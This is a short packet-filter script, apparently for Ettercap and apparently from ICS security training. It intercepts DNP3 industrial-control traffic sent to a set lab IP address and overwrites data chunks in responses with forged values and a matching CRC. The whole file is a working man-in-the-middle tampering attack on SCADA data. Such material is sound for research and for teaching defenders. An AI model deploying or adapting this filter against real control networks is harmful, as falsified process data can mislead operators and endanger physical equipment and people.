###########################################
# Name: dnp3-replace-chunks.filter
# Description: Replace data chunks in DNP3 messages
#              Wireshark shows these starting at byte 'frame[75:]
#              These are 16 byte chunks with a 2 byte 'crc-16-dnp' CRC 
#              in little-endian order 
#
# Created by: Don C. Weber (@cutaway)
# Date Created: November 2022
# Version: 0.1
###########################################

# Checking to see if the destination is the server and the protocol is DNP3
# Note: The IP address will need to be updated for your server

if (ip.dst == '192.168.0.21') {
    if (tcp.src == 20000) {
        # Check for DNP3 message and a DNP3 data with length 101 and Control Byte is 0x44. 
        if (DATA.data == "\x05\x64\x65\x44"){
            # Overwrite DNP3 packet data
            DATA.data + 28 = "\xaa\xaa\x01\xaa\xaa\x01\xaa\xaa\x01\xaa\xaa\x01\xaa\xaa\x01\xaa\xa9\xb6";
            # Printing a message when the filter fires.
            msg("Updated DNP3 data with 0xaaaa01aaaa01aaaa01aaaa01aaaa01aaa9b6");
        }
    }
}